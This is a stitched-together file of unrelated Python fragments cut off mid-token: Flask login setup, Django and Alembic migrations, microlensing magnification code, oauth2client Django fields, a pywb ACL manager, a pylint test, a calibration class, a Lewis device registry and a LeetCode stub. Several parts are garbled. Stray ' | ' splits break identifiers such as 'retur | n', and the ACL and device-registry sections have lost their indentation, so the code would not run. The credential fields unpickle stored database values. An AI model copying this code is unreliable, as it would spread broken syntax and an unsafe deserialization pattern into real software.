# ---------------------------------------------------------------------------
login_manager = LoginManager()
# Unauthenticated requests to protected views get redirected to this endpoint.
login_manager.login_view = "auth.signin"
# Attach the login manager to the Flask application instance.
login_manager.init_app(app)
from flask import render_template


def home():
    """Render the application's landing page.

    :return: The rendered ``index.html`` template.
    """
    # Restored from a garbled 'rend | er_template' token and removed a
    # stray '|' artifact line that broke the module's syntax.
    return render_template('index.html')
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-09-09 10:54
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial migration for the events app: creates the Event model.

    Restored two garbled tokens ('seriali | ze=False', 'max | _length=8')
    that broke the file's syntax.
    """

    initial = True

    dependencies = [
        ('groups', '0001_initial'),
    ]

    operations = [
        migrations.CreateModel(
            name='Event',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=30)),
                ('description', models.TextField()),
                ('subject', models.CharField(max_length=20)),
                ('event_type', models.CharField(choices=[('quiz', 'Quiz'), ('test', 'Test'), ('homework', 'Homework')], max_length=8)),
                ('due', models.DateTimeField()),
                # Deleting a group cascades to its events.
                ('group', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='groups.Group')),
            ],
        ),
    ]
|
# -*-coding:Utf-8 -*
# ====================================================================
# ====================================================================
# Packages
# ====================================================================
import sys
import numpy as np
from muLAn.models.multipole import hexamag
# ====================================================================
# Functions
# ====================================================================
def magnifcalc(t, param, Ds=None, tb=None):
    """Return the hexadecapolar approximation of the magnification.

    :param t: numpy array of dates.
    :param param: dict of model parameters (t0, u0, tE, rho, gamma, q,
        piEN, piEE, alpha, s, dadt, dsdt).
    :param Ds: dict with 'N'/'E' parallax shift arrays.
    :param tb: reference date for the linear orbital-motion development.
    :return: numpy array of magnifications, one per date.
    """
    # Model parameters
    t0, u0, tE = param['t0'], param['u0'], param['tE']
    rho, gamma, q = param['rho'], param['gamma'], param['q']
    piEN, piEE = param['piEN'], param['piEE']
    # Lens orbital motion: time-dependent binary angle and separation
    alpha, s = lens_rotation(param['alpha'], param['s'],
                             param['dadt'], param['dsdt'], t, tb)
    # Annual-parallax-corrected source trajectory
    DsN, DsE = Ds['N'], Ds['E']
    tau = (t - t0) / tE + piEN * DsN + piEE * DsE
    beta = u0 + piEN * DsE - piEE * DsN
    x, y = binrot(alpha, tau, beta)
    # Shift origin: center of mass -> Cassan (2008) convention
    x = x - s * q / (1. + q)
    # Complex source position and per-epoch hexadecapole magnification
    zeta0 = x + 1j * y
    mags = [hexamag(s[i], q, rho, gamma, zeta0[i]) for i in range(len(x))]
    return np.array(mags)
# --------------------------------------------------------------------
def binrot(theta, x_old, y_old):
    """Rotate 2-D coordinates by an angle theta.

    :param theta: float, angle in radians.
    :param x_old: numpy array, x coordinate in the old frame.
    :param y_old: numpy array, y coordinate in the old frame.
    :return: tuple (x_new, y_new) of coordinates in the rotated frame.
    """
    c, s = np.cos(theta), np.sin(theta)
    # Standard counter-clockwise rotation matrix applied component-wise.
    return x_old * c - y_old * s, x_old * s + y_old * c
# --------------------------------------------------------------------
def lens_rotation(alpha0, s0, dalpha, ds, t, tb):
    """Linear development of the lens orbital motion.

    Computes the binary-axis angle alpha and projected separation s at each
    date, from their values and rates at the reference date tb.

    :param alpha0: float, angle alpha at date tb.
    :param s0: float, projected separation at date tb.
    :param dalpha: float, angular velocity at tb (radians/year).
    :param ds: float, separation change rate (year^-1).
    :param t: numpy array of dates (days).
    :param tb: float, reference date of the linear development.
    :return: tuple (alpha, s) of arrays evaluated at each date.
    """
    DAYS_PER_YEAR = 365.25  # Julian year in days
    elapsed_years = (t - tb) / DAYS_PER_YEAR
    # Note the sign convention: alpha decreases for positive dalpha.
    alpha = alpha0 - elapsed_years * dalpha
    s = s0 + elapsed_years * ds
    return alpha, s
|
# Copyright (C) 2010 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""OAuth 2.0 utilities for Django.
Utilities for using OAuth 2.0 in conjunction with
the Django datastore.
"""
__author__ = 'jcgregorio@google.com (Joe Gregorio)'
import oauth2client
import base64
import pickle
from django.db import models
from oauth2client.client import Storage as BaseStorage
class CredentialsField(models.Field):
    """Django model field storing oauth2client Credentials objects.

    Values are persisted as base64-encoded pickles in a TEXT column.
    NOTE: unpickling database content is only safe while the database
    contents are trusted.
    """

    def __init__(self, *args, **kwargs):
        # Credentials columns are nullable unless the caller says otherwise.
        if 'null' not in kwargs:
            kwargs['null'] = True
        super(CredentialsField, self).__init__(*args, **kwargs)

    def get_internal_type(self):
        """Map this field onto Django's TextField column type."""
        return "TextField"

    def from_db_value(self, value, expression, connection):
        """Deserialize the stored base64 pickle back into Credentials."""
        if value is None:
            return value
        return pickle.loads(base64.b64decode(value))

    def to_python(self, value):
        """Coerce a raw/stored value to a Credentials object (or None)."""
        if value is None:
            return None
        if isinstance(value, oauth2client.client.Credentials):
            return value
        return pickle.loads(base64.b64decode(value))

    def get_db_prep_value(self, value, connection, prepared=False):
        """Serialize a Credentials object for database storage."""
        if value is None:
            return None
        # Restored from a garbled 'b64e | ncode' token: pickle then base64.
        return base64.b64encode(pickle.dumps(value))

    def deconstruct(self):
        # 'null' is forced to True in __init__, so it is dropped from the
        # kwargs serialized into migrations.
        # Restored from a garbled 'n | ame' token below.
        name, path, args, kwargs = super().deconstruct()
        del kwargs['null']
        return name, path, args, kwargs
class FlowField(models.Field):
    """Django model field storing oauth2client Flow objects.

    Values are persisted as base64-encoded pickles, mirroring
    CredentialsField.
    """

    def __init__(self, *args, **kwargs):
        # Flow columns are nullable unless the caller says otherwise.
        if 'null' not in kwargs:
            kwargs['null'] = True
        super(FlowField, self).__init__(*args, **kwargs)

    def get_internal_type(self):
        """Map this field onto Django's TextField column type."""
        return "TextField"

    def to_python(self, value):
        """Coerce a raw/stored value to a Flow object (or None)."""
        if value is None:
            return None
        if isinstance(value, oauth2client.client.Flow):
            return value
        return pickle.loads(base64.b64decode(value))

    def from_db_value(self, value, expression, connection):
        """Deserialize the stored base64 pickle back into a Flow.

        BUG FIX: this previously returned
        ``base64.b64encode(pickle.dumps(value))`` — i.e. it re-encoded the
        stored text instead of decoding it, so every read from the database
        produced garbage bytes. ``from_db_value`` must invert
        ``get_db_prep_value``, exactly as in CredentialsField.
        """
        if value is None:
            return None
        return pickle.loads(base64.b64decode(value))

    def get_db_prep_value(self, value, connection, prepared=False):
        """Serialize a Flow object for database storage."""
        if value is None:
            return None
        return base64.b64encode(pickle.dumps(value))

    def deconstruct(self):
        # 'null' is forced to True in __init__, so it is dropped from the
        # kwargs serialized into migrations.
        name, path, args, kwargs = super().deconstruct()
        del kwargs['null']
        return name, path, args, kwargs
class Storage(BaseStorage):
    """Store and retrieve a single credential to and from
    the datastore.

    This Storage helper presumes the Credentials
    have been stored as a CredentialsField
    on a db model class.
    """

    def __init__(self, model_class, key_name, key_value, property_name):
        """Constructor for Storage.

        Args:
            model_class: db.Model, model class holding the credentials
            key_name: string, key name for the entity that has the credentials
            key_value: string, key value for the entity that has the credentials
            property_name: string, name of the property that is a CredentialsField
        """
        self.model_class = model_class
        self.key_name = key_name
        self.key_value = key_value
        self.property_name = property_name

    def locked_get(self):
        """Retrieve Credential from datastore.

        Returns:
            oauth2client.Credentials, or None when no matching entity exists.
        """
        credential = None
        query = {self.key_name: self.key_value}
        entities = self.model_class.objects.filter(**query)
        if len(entities) > 0:
            credential = getattr(entities[0], self.property_name)
            # Let the credential persist itself through this storage when
            # it is refreshed later on.
            if credential and hasattr(credential, 'set_store'):
                credential.set_store(self)
        return credential

    def locked_put(self, credentials):
        """Write a Credentials to the datastore.

        Args:
            credentials: Credentials, the credentials to store.
        """
        args = {self.key_name: self.key_value}
        entity = self.model_class(**args)
        setattr(entity, self.property_name, credentials)
        entity.save()

    def locked_delete(self):
        """Delete Credentials from the datastore."""
        query = {self.key_name: self.key_value}
        # The queryset was previously bound to an unused variable;
        # delete() is called purely for its side effect.
        self.model_class.objects.filter(**query).delete()
|
if not self.COLL_RX.match(coll_name):
return False
if not os.path.isdir(os.path.join(self.COLLS_DIR, coll_name)):
return False
return True
def load_acl(self, must_exist=True):
"""Loads the access control list
:param bool must_exist: Does the acl file have to exist
:return: T/F indicating load success
:rtype: bool
"""
try:
with open(self.acl_file, 'rb') as fh:
for line in fh:
if line:
self.rules.append(CDXObject(line))
return True
except IOError as io:
if must_exist:
print('Error Occured: ' + str(io))
return False
except Exception as e:
print('Error Occured: ' + str(e))
return False
    def save_acl(self, r=None):
        """Save the contents of the rules as cdxj entries to
        the access control list file

        :param argparse.Namespace|None r: Not used
        :rtype: None
        """
        # Broad OSError swallow is intentional: the directory usually already
        # exists, and any other failure surfaces when the file is opened below.
        try:
            os.makedirs(os.path.dirname(self.acl_file))
        except OSError:
            pass
        try:
            # Rewrite the whole file from the in-memory rule list.
            with open(self.acl_file, 'wb') as fh:
                for acl in self.rules:
                    fh.write(acl.to_cdxj().encode('utf-8'))
        except Exception as e:
            print('Error Saving ACL Rules: ' + str(e))
def to_key(self, url_or_surt, exact_match=False):
""" If 'url_or_surt' already a SURT, use as is
If exact match, add the exact match suffix
:param str url_or_surt: The url or surt to be converted to an acl key
:param bool exact_match: Should the exact match suffix be added to key
:rtype: str
"""
if self.SURT_RX.search(url_or_surt):
result = url_or_surt
else:
result = canonicalize(url_or_surt)
if exact_match:
result += AccessChecker.EXACT_SUFFIX
return result
def validate_access(self, access):
"""Returns true if the supplied access value is valid
otherwise terminates the process
:param str access: The access value to be validated
:return: True if valid
:rtype: bool
"""
if access not in self.VALID_ACCESS:
print('Valid access values are: ' + ', '.join(self.VALID_ACCESS))
sys.exit(1)
return True
def add_rule(self, r):
"""Adds a rule the ACL manager
:param argparse.Namespace r: The argparse namespace representing the rule to be added
:rtype: None
"""
return self._add_rule(r.url, r.access, r.exact_match)
    def _add_rule(self, url, access, exact_match=False):
        """Adds an rule to the acl file

        The rule list is kept sorted (descending cdxj order); a rule with the
        same urlkey/timestamp replaces the existing entry, otherwise the new
        rule is inserted at its sorted position and the file is saved.

        :param str url: The URL for the rule
        :param str access: The access value for the rule
        :param bool exact_match: Is the rule to be added an exact match
        :rtype: None
        """
        # validate_access() terminates the process on invalid input, so this
        # early return is effectively dead code kept as a safety net.
        if not self.validate_access(access):
            return
        acl = CDXObject()
        acl['urlkey'] = self.to_key(url, exact_match)
        acl['timestamp'] = '-'
        acl['access'] = access
        acl['url'] = url
        # Walk the descending rule list to find either an existing rule with
        # the same key/timestamp (replace) or the sorted insertion point.
        i = 0
        replace = False
        for rule in self.rules:
            if acl['urlkey'] == rule['urlkey'] and acl['timestamp'] == rule['timestamp']:
                replace = True
                break
            if acl > rule:
                break
            i += 1
        if replace:
            print('Existing Rule Found, Replacing:')
            self.print_rule(self.rules[i])
            print('with:')
            self.print_rule(acl)
            self.rules[i] = acl
        else:
            print('Added new Rule:')
            self.print_rule(acl)
            self.rules.insert(i, acl)
        # Persist immediately so the file always reflects the in-memory list.
        self.save_acl()
def validate_save(self, r=None, log=False):
"""Validates the acl rules and saves the file
:param argparse.Namespace|None r: Not used
:param bool log: Should a report be printed to stdout
:rtype: None
"""
self.validate(log=log, correct=True)
def validate(self, log=False, correct=False):
"""Validates the acl rules returning T/F if the list should be saved
:param bool log: Should the results of validating be logged to stdout
:param bool correct: Should invalid results be corrected and saved
:rtype: None
"""
last_rule = None
out_of_order = False
for rule in self.rules:
if last_rule and rule > last_rule:
out_of_order = True
break
last_rule = rule
if out_of_order:
if log:
print('Rules out of order, resorting')
if correct:
self.rules.sort(reverse=True)
self.save_acl()
elif log:
print('Rules in order')
def remove_rule(self, r):
"""Removes a rule from the acl file
:param argparse.Namespace r: Parsed result from ArgumentParser
:rtype: None
"""
i = 0
urlkey = self.to_key(r.url, r.exact_match)
for rule in self.rules:
if urlkey == rule['urlkey']:
acl = self.rules.pop(i)
print('Removed Rule:')
self.print_rule(acl)
self.save_acl()
return
i += 1
print('Rule to remove not found!')
def list_rules(self, r):
"""Print the acl rules to the stdout
:param argparse.Namespace|None r: Not used
:rtype: None
"""
print('Rules for {0} from {1}:'.format(self.target, self.acl_file))
print('')
for rule in self.rules:
sys.stdout.write(rule.to_cdxj())
print('')
    def find_match(self, r):
        """Finds a matching acl rule

        Uses an AccessChecker with a '<default>' fallback; an empty urlkey on
        the returned rule means no stored rule matched the URL.

        :param argparse.Namespace r: Parsed result from ArgumentParser
        :rtype: None
        """
        access_checker = AccessChecker(self.acl_file, '<default>')
        rule = access_checker.find_access_rule(r.url)
        print('Matched rule:')
        print('')
        if rule['urlkey'] == '':
            print('    <No Match, Using Default Rule>')
            print('')
        else:
            self.print_rule(rule)
def add_excludes(self, r):
"""
Import old-style excludes, in url-per-line format
:param argparse.Namespace r: Parsed result from ArgumentParser
"""
if not self.validate_access(r.access):
retur | n
try:
with open(r.filename, 'rb') as fh:
count = 0
for url in fh:
url = url.decode('utf-8').strip()
self._add_rule(url, r.access)
count += 1
print('Added or replaced {0} rules from '.format(count) + r.f | ilename)
except Exception as e:
print('Error Importing: ' + str(e))
sys.exit(1)
    def print_rule(self, rule):
        """Prints the supplied rule to the std out

        Output is indented one level for readability under section headers.

        :param CDXObject rule: The rule to be printed
        :rtype: None
        """
        print('    ' + rule.to_cdxj())
@classmethod
def init_parser(cls, parser):
"""Initializes an argument parser for acl commands
:param argparse.ArgumentParser parser: The parser to be initialized
:rtype: None
"""
subparsers = parser.add_subparsers(dest='op')
subparsers.required = True
def command(name, *args, **kwargs):
op = subparsers.add_parser(name)
for arg in args:
if arg == 'default_access':
op.add_argument(arg, nargs='?', default='allow')
else:
op.add_argument(arg)
if kwargs.get('exact_opt'):
op.add_argument('-e', '--exact-match', action='store_true', default=False)
op.set_defaults(acl_func=kwargs['func'])
command('add', 'coll_name', 'url', 'access', func=cls.add_rule, exact_opt=True)
command('r |
"""Test that boolean conditions simplify to a constant value"""
# pylint: disable=pointless-statement
from unknown import Unknown # pylint: disable=import-error
def func(_):
    """Pointless function"""
    CONSTANT = 100
    OTHER = 200
    # Simplifies any boolean expression that is coerced into a True/False value
    bool(CONSTANT or True) # [condition-evals-to-constant]
    assert CONSTANT or True # [condition-evals-to-constant]
    if CONSTANT and False: # [condition-evals-to-constant]
        pass
    elif CONSTANT and False: # [condition-evals-to-constant]
        pass
    while CONSTANT and False: # [condition-evals-to-constant]
        break
    1 if CONSTANT or True else 2 # [condition-evals-to-constant]
    z = [x for x in range(10) if x or True] # [condition-evals-to-constant]
    # Simplifies recursively
    assert True or CONSTANT or OTHER # [condition-evals-to-constant]
    assert (CONSTANT or True) or (CONSTANT or True) # [condition-evals-to-constant]
    # Will try to infer the truthiness of an expression as long as it doesn't contain any variables
    assert 3 + 4 or CONSTANT # [condition-evals-to-constant]
    assert Unknown or True # [condition-evals-to-constant]
    assert True or True # [condition-evals-to-constant]
    assert False or False # [condition-evals-to-constant]
    assert True and True # [condition-evals-to-constant]
    assert False and False # [condition-evals-to-constant]
    # A bare constant that's not inside of a boolean operation will emit `using-constant-test` instead
    if True: # pylint: disable=using-constant-test
        pass
    # Expressions not in one of the above situations will not emit a message
    CONSTANT or True
    bool(CONSTANT or OTHER)
    bool(func(CONSTANT or True))
|
"""split gsm signal in two analytics, one per sim card
Revision ID: 31d36774c549
Revises: 528f90a47515
Create Date: 2019-01-23 15:16:58.514742
"""
# revision identifiers, used by Alembic.
revision = '31d36774c549'
down_revision = '528f90a47515'
from alembic import op
import sqlalchemy as sa
def upgrade():
    """Split the single gsm_signal column into one column per SIM card."""
    # Restored a garbled 'alter_ | column' token: rename the existing
    # column to gsm_signal_1, then add the nullable gsm_signal_2 column.
    op.alter_column('radio_stationanalytic', 'gsm_signal', new_column_name='gsm_signal_1')
    op.add_column('radio_stationanalytic', sa.Column('gsm_signal_2', sa.Integer(), nullable=True))
def downgrade():
    """Revert the split: merge back to a single gsm_signal column."""
    op.alter_column('radio_stationanalytic', 'gsm_signal_1', new_column_name='gsm_signal')
    op.drop_column('radio_stationanalytic', 'gsm_signal_2')
|
import todsynth
import os
import numpy
import json
import pandas
class Calibrator( object ):
    '''
    A todsynth.calibrator object is a container that stores coefficients
    that transform RAW dac units to physical units for a given TOD.
    '''

    # Class-level defaults; instances receive their own copies in __init__.
    name = ""
    description = ""
    calType = ""
    # Free-form metadata dictionary. Careful not to abuse of this in the
    # sense of using it to process data!
    info = {}
    # Calibration coefficients exposed to callers via getCoeffs().
    coeffs = numpy.empty(0)
    # Detector index to Unique Identifier array.
    __uid = numpy.empty(0)

    def __init__(self, name="", description="", calType=""):
        '''
        Create a calibrator.

        All arguments default to empty strings, keeping the old
        no-argument constructor working unchanged.
        '''
        self.name = name
        self.description = description
        self.calType = calType
        # Per-instance state: the previous class-level ``info`` dict was
        # shared by every instance, so one updateInfo() leaked into all.
        self.info = {}
        self.coeffs = numpy.empty(0)
        self.__coeffs = numpy.empty(0)
        self.__uid = numpy.empty(0)

    def setCoeffs(self, c, uid=None):
        '''
        Set calibrator coefficients to a copy of c.

        :param c: array-like of calibration coefficients.
        :param uid: optional detector index -> UID array; when given the
            public coefficients are re-ordered as ``c[uid]`` (assumes every
            uid entry is a valid index into c -- TODO confirm with callers).
        '''
        # numpy.copy() avoids cross referencing the caller's buffer.
        self.__coeffs = numpy.copy(c)
        # Bug fix: the public ``coeffs`` was previously never assigned from
        # ``c`` -- the old code indexed the empty class-level array, so
        # getCoeffs() always returned an empty (or broken) result.
        self.coeffs = numpy.copy(c)
        if uid is not None:
            self.__uid = numpy.copy(uid)
            self.coeffs = self.coeffs[self.__uid]
        else:
            self.__uid = numpy.arange(len(self.coeffs))

    def getCoeffs(self):
        '''
        Get a *copy* of the coefficients array.
        '''
        return numpy.copy(self.coeffs)

    def updateInfo(self, prop, value):
        '''
        Update calibrator info with a pair of prop : value.
        '''
        # Bug fix: the key used to be the literal string 'prop', so every
        # update clobbered the same single entry regardless of the name.
        self.info.update({prop: value})

    def storeInPath(self, outPath):
        '''
        Stores the calibrator as "<name>.<calType>.cal" (space-separated
        text with a header row) in the specified directory.
        '''
        # Serialize this object's raw coefficients and uid map.
        data = {
            'coefficients': self.__coeffs,
            'uid': self.__uid}
        df = pandas.DataFrame(data)
        df.to_csv(os.path.join(
            outPath, "%s.%s.cal" % (self.name, self.calType)),
            index=False,
            sep=' ',
            header=True)

    @classmethod
    def readFromPath(cls, systemPath):
        '''
        Load a calibrator previously written by storeInPath(). The file
        name is expected to look like "<name>.<calType>.cal".
        '''
        self = cls()
        name, caltype, _ = os.path.basename(systemPath).split('.')
        self.name = name
        self.calType = caltype
        self.description = ''
        # Load the two-column table written by storeInPath().
        calDF = pandas.read_csv(
            systemPath,
            header=0,
            names=['coefficients', 'uid'],
            delimiter=' ')
        self.setCoeffs(calDF['coefficients'], uid=calDF['uid'])
        return self
|
he keys are
type names, the values are the types themselves.
"""
return self._device_types
@property
def default_device_type(self):
"""
If the module only defines one device type, it is the default device type. It is used
whenever a setup does not provide a ``device_type``.
"""
if len(self.device_types) == 1:
return self.device_types[0]
return None
    @property
    def interfaces(self):
        """
        This property contains a map with protocols as keys and interface types as values.
        The types are imported from the ``interfaces`` sub-module and from the device module
        itself. If two interfaces with the same protocol are discovered, a RuntimeError is raised.
        """
        # NOTE(review): populated elsewhere in this class (not visible here).
        return self._interfaces
@property
def protocols(self):
"""All available protocols for this device."""
return list(self.interfaces.keys())
@property
def default_protocol(self):
"""In case only one protocol exists for the device, this is the default protocol."""
if len(self.protocols) == 1:
return self.protocols[0]
return None
    @property
    def setups(self):
        """
        A map with all available setups. Setups are imported from the ``setups`` dictionary
        in a device module and from the ``setups`` sub-module. If no ``default``-setup exists,
        one is created using the default_device_type. If there are several device types in
        the module, the default setup must be provided explicitly.
        """
        # NOTE(review): populated elsewhere in this class (not visible here).
        return self._setups
    def _create_device_instance(self, device_type, **kwargs):
        """Instantiate ``device_type`` with ``kwargs``, refusing unknown types."""
        if device_type not in self.device_types:
            raise RuntimeError('Can not create instance of non-device type.')
        return device_type(**kwargs)
    def create_device(self, setup=None):
        """
        Creates a device object according to the provided setup. If no setup is provided,
        the default setup is used. If the setup can't be found, a LewisException is raised.
        This can also happen if the device type specified in the setup is invalid.

        :param setup: Name of the setup from which to create device.
        :return: Device object initialized according to the provided setup.
        """
        setup_name = setup if setup is not None else 'default'
        if setup_name not in self.setups:
            raise LewisException(
                'Failed to find setup \'{}\' for device \'{}\'. '
                'Available setups are:\n    {}'.format(
                    setup, self.name, '\n    '.join(self.setups.keys())))
        setup_data = self.setups[setup_name]
        # Fall back to the module's only device type when the setup names none.
        device_type = setup_data.get('device_type') or self.default_device_type
        self.log.debug('Trying to create device \'%s\' (setup: %s, device type: %s)',
                       self.name, setup_name, device_type.__name__ if device_type else '')
        try:
            return self._create_device_instance(
                device_type, **setup_data.get('parameters', {}))
        except RuntimeError:
            # Raised by _create_device_instance for an invalid/missing type.
            raise LewisException(
                'The setup \'{}\' you tried to load does not specify a valid device type, but the '
                'device module \'{}\' provides multiple device types so that no meaningful '
                'default can be deduced.'.format(setup_name, self.name))
    def get_interface_type(self, protocol=None):
        """Return the interface type registered for ``protocol``.

        NOTE(review): unlike create_interface, this does not substitute the
        default protocol when ``protocol`` is None — confirm that is intended.
        """
        return self.interfaces[protocol]
    def create_interface(self, protocol=None, *args, **kwargs):
        """
        Returns an interface that implements the provided protocol. If the protocol is not
        known, a LewisException is raised. All additional arguments are forwarded
        to the interface constructor (see :class:`~lewis.adapters.Adapter` for details).

        :param protocol: Protocol which the interface must implement.
        :param args: Positional arguments that are passed on to the interface.
        :param kwargs: Keyword arguments that are passed on to the interface.
        :return: Instance of the interface type.
        """
        protocol = protocol if protocol is not None else self.default_protocol
        self.log.debug('Trying to create interface for protocol \'%s\'', protocol)
        # EAFP: attempt the lookup and translate a miss into a user-facing error.
        try:
            return self.interfaces[protocol](*args, **kwargs)
        except KeyError:
            raise LewisException(
                '\'{}\' is not a valid protocol for device \'{}\', select one via the -p option.\n'
                'Available protocols are: \n    {}'.format(
                    protocol, self.name, '\n    '.join(self.interfaces.keys())))
@has_log
class DeviceRegistry(object):
"""
This class takes the name of a module and constructs a :class:`DeviceBuilder` from
each sub-module. The available devices can be queried and a DeviceBuilder can be
obtained for each device:
.. sourcecode:: Python
from lewis.core.devices import DeviceRegistry
registry = DeviceRegistry('lewis.devices')
chopper_builder = registry.device_builder('chopper')
# construct device, interface, ...
If the module can not be imported, a LewisException is raised.
:param device_module: Name of device module from which devices are loaded.
"""
def __init__(self, device_module):
try:
| self._device_module = importlib.import_module(device_module)
except Impo | rtError:
raise LewisException(
'Failed to import module \'{}\' for device discovery. '
'Make sure that it is in the PYTHONPATH.\n'
'See also the -a option of lewis.'.format(device_module))
self._devices = {name: DeviceBuilder(module) for name, module in
get_submodules(self._device_module).items()}
self.log.debug('Devices loaded from \'%s\': %s', device_module,
', '.join(self._devices.keys()))
    @property
    def devices(self):
        """All available device names."""
        # NOTE(review): returns a dict key view (fine for iteration and
        # membership tests), not a list.
        return self._devices.keys()
def device_builder(self, name, strict_versions=None):
"""
Returns a :class:`DeviceBuilder` instance that can be used to create device objects
based on setups, as well as device interfaces. If the device name is not stored
in the internal map, a LewisException is raised.
Each DeviceBuilder has a ``framework_version``-member, which specifies the version
of Lewis the device has been written for. If the version does not match the current
framework version, it is only possible to obtain those device builders calling the
method with ``strict_versions`` set to ``False``, otherwise a
:class:`~lewis.core.exceptions.LewisException` is raised. A warning message is logged
in all cases. If ``framework_version`` is ``None`` (e.g. not specified at all), it
is accepted unless ``strict_versions`` is set to ``True``.
:param name: Name of the device.
:param strict_versions: If ``True`` or ``None``, raise an exception when version of device
does not match framework version.
:return: :class:`DeviceBuilder`-object for requested device.
"""
try:
builder = self._devices[name]
compatible = is_compatible_with_framework(builder.framework_version)
if not compatible:
self.log.warning(
'Device \'%s\' is specified for a different framework version '
'(required: %s, current: %s). This means that the device might not work '
'as expected. Contact the device author about updating the device or use a '
'different version of lewis to run this device.',
builder.name, builder.framework_version, __version__)
if strict_versions or (compatible is not None and strict_versions is None):
raise LewisException(
'Not loading device \'{}\' with different framework version '
|
__source__ = 'https://leetcode.com/problems/sliding-window-median/'
# Time: O(n*logk)
# Space: O()
#
# Description: 480. Sliding Window Median
#
# Median is the middle value in an ordered integer list.
# If the size of the list is even, there is no middle value.
# So the median is the mean of the two middle value.
#
# Examples:
# [2,3,4] , the median is 3
#
# [2,3], the median is (2 + 3) / 2 = 2.5
#
# Given an array nums, there is a sliding window of size k which is moving from the very left of the array
# to the very right. You can only see the k numbers in the window.
# Each time the sliding window moves right by one position.
# Your job is to output the median array for each window in the original array.
#
# For example,
# Given nums = [1,3,-1,-3,5,3,6,7], and k = 3.
#
# Window position Median
# --------------- -----
# [1 3 -1] -3 5 3 6 7 1
# 1 [3 -1 -3] 5 3 6 7 -1
# 1 3 [-1 -3 5] 3 6 7 -1
# 1 3 -1 [-3 5 3] 6 7 3
# 1 3 -1 -3 [5 3 6] 7 5
# 1 3 -1 -3 5 [3 6 7] 6
# Therefore, return the median sliding window as [1,-1,-1,3,5,6].
#
# Note:
# You may assume k is always valid, ie: 1 <= k <= input array's size for non-empty array.
#
# Hide Company Tags Google
# Hide Similar Problems (H) Find Median from Data Stream
#
import unittest
class Solution(object):
    # Placeholder: the sliding-window-median implementation goes here.
    pass # your function here
class TestMethods(unittest.TestCase):
    def test_Local(self):
        """Trivial sanity check so the runner always has one passing test."""
        self.assertEqual(1, 1)
# Run the unit tests for this module when it is executed directly.
if __name__ == '__main__':
    unittest.main()
Java = '''
# Thought: https://leetcode.com/problems/sliding-window-median/solution/
TreeMap is used to implement an ordered MultiSet.
Almost the same idea of Find Median from Data Stream
https://leetcode.com/problems/find-median-from-data-stream/
Use two Heaps to store numbers. maxHeap for numbers smaller than current median,
minHeap for numbers bigger than and equal to current median.
A small trick I used is always make size of minHeap equal (when there are even numbers)
or 1 element more (when there are odd numbers) than the size of maxHeap.
Then it will become very easy to calculate current median.
Keep adding number from the right side of the sliding window and
remove number from left side of the sliding window.
And keep adding current median to the result.
# 82ms 22.97%
class Solution {
public double[] medianSlidingWindow(int[] nums, int k) {
double[] res = new double[nums.length-k+1];
TreeMap<Integer, Integer> minHeap = new TreeMap<Integer, Integer>();
TreeMap<Integer, Integer> maxHeap = new TreeMap<Integer, Integer>(Collections.reverseOrder());
int minHeapCap = k/2; //smaller heap when k is odd.
int maxHeapCap = k - minHeapCap;
for(int i=0; i< k; i++){
maxHeap.put(nums[i], maxHeap.getOrDefault(nums[i], 0) + 1);
}
int[] minHeapSize = new int[]{0};
int[] maxHeapSize = new int[]{k};
for(int i=0; i< minHeapCap; i++){
move1Over(maxHeap, minHeap, maxHeapSize, minHeapSize);
}
res[0] = getMedian(maxHeap, minHeap, maxHeapSize, minHeapSize);
int resIdx = 1;
for(int i=0; i< nums.length-k; i++){
int addee = nums[i+k];
if(addee <= maxHeap.keySet().iterator().next()){
add(addee, maxHeap, maxHeapSize);
} else {
add(addee, minHeap, minHeapSize);
}
int removee = nums[i];
if(removee <= maxHeap.keySet().iterator().next()){
remove(removee, maxHeap, maxHeapSize);
} else {
remove(removee, minHeap, minHeapSize);
}
//rebalance
if(minHeapSize[0] > minHeapCap){
move1Over(minHeap, maxHeap, minHeapSize, maxHeapSize);
} else if(minHeapSize[0] < minHeapCap){
move1Over(maxHeap, minHeap, maxHeapSize, minHeapSize);
}
res[resIdx] = getMedian(maxHeap, minHeap, maxHeapSize, minHeapSize);
resIdx++;
}
return res;
}
public double getMedian(TreeMap<Integer, Integer> big | Heap, TreeMap<Integer, Integer> smallHeap, int[] bigHeapSize, int[] smallHeapSize){
return bigHeapSize[0] > smallHeap | Size[0] ? (double) bigHeap.keySet().iterator().next() : ((double) bigHeap.keySet().iterator().next() + (double) smallHeap.keySet().iterator().next()) / 2.0;
}
//move the top element of heap1 to heap2
public void move1Over(TreeMap<Integer, Integer> heap1, TreeMap<Integer, Integer> heap2, int[] heap1Size, int[] heap2Size){
int peek = heap1.keySet().iterator().next();
add(peek, heap2, heap2Size);
remove(peek, heap1, heap1Size);
}
public void add(int val, TreeMap<Integer, Integer> heap, int[] heapSize){
heap.put(val, heap.getOrDefault(val,0) + 1);
heapSize[0]++;
}
public void remove(int val, TreeMap<Integer, Integer> heap, int[] heapSize){
if(heap.put(val, heap.get(val) - 1) == 1) heap.remove(val);
heapSize[0]--;
}
}
'''
|
2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
from typing import Awaitable, Callable, Dict, Optional, Sequence, Union
import pkg_resources
import google.auth # type: ignore
import google.api_core
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import retry as retries
from google.api_core import operations_v1
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
from google.cloud.data_fusion_v1.types import datafusion
from google.longrunning import operations_pb2 # type: ignore
try:
    # Report the installed library version in the client's user-agent string.
